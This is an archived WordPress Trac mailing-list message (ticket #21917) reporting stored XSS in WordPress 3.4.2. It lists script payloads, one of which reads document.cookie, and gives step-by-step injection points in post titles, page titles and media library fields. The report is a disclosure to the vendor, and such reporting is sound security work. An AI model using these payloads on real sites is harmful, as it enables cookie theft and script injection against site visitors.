[wp-trac] [WordPress Trac] #21917: Wordpress 3.4.2 - Multiple XSS Vulnerability
WordPress Trac
wp-trac at lists.automattic.com
Tue Sep 18 04:36:29 UTC 2012
#21917: Wordpress 3.4.2 - Multiple XSS Vulnerability
-----------------------------+--------------------------
Reporter: nuxbie | Type: defect (bug)
Status: new | Priority: normal
Milestone: Awaiting Review | Component: General
Version: 3.4.2 | Severity: normal
Keywords: |
-----------------------------+--------------------------
[ Wordpress 3.4.2 - Multiple XSS Vulnerability ]
Hello, my name is Catur Febrian (nuxbie).
I have bugs at new webapps wordpress (last version).
This bugs is XSS (Cross Site Scripting).
Wordpress 3.4.2 have a multiple vuln.
1. XSS WP-Post.
2. XSS WP-Page.
3. XSS WP-MediaLibrary.
Please, read my exploit report... :-)
Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
Author : TheCyberNuxbie [ Catur Febrian ]
E-mail : root at 31337sec.com
Version CMS : Version 3.4.2 (Last Version)
Category : WebApps / Content Management System (CMS)
Security Risk: Medium Level
Link Downlaod: http://www.wordpress.org/
Tested On : Mozilla Firefox + Xampp + Windows 7 x32 ID
[ Information Content ]
WordPress - Web Publishing Software.
http://www.wordpress.org/
[ Vulnerability Details ]
1. XSS WP-Post.
2. XSS WP-Page.
3. XSS WP-MediaLibrary.
[ XSS CODE ]
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.google.com/")</script>
- Exploit Report:
1. Create / Edit WP-Post:
Input "Title Post" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php <--- Publish.
View XSS: http://wordpress/?p=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-post1.jpg +
http://31337sec.com/wordpress/xss-post2.jpg
2. Create / Edit WP-Page:
Input "Title Page" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
View XSS: http://wordpress/?page_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-page1.jpg +
http://31337sec.com/wordpress/xss-page2.jpg
3. Add / Edit WP-Media Library:
Upload files via Media Library.
http://wordpress/wp-admin/media-new.php <--- Select File.
Upload Files, Save...!!!
Input Form "Title", "Caption", "Description" with Script XSS <--- Save All
Changes.
View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-media1.jpg +
http://31337sec.com/wordpress/xss-media2.jpg +
http://31337sec.com/wordpress/xss-media3.jpg
- Script XSS will be affacted:
1. Frontend Website (post).
http://wordpress/?p=xxx <--- XSSed.
2. Frontend Website (page).
http://wordpress/?page_id=xxx <--- XSSed.
3. Frontend Website (attachment).
http://wordpress/?attachment_id=xxx <--- XSSed.
Thanks...
TheCyberNuxbie
--
Ticket URL: <http://core.trac.wordpress.org/ticket/21917>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list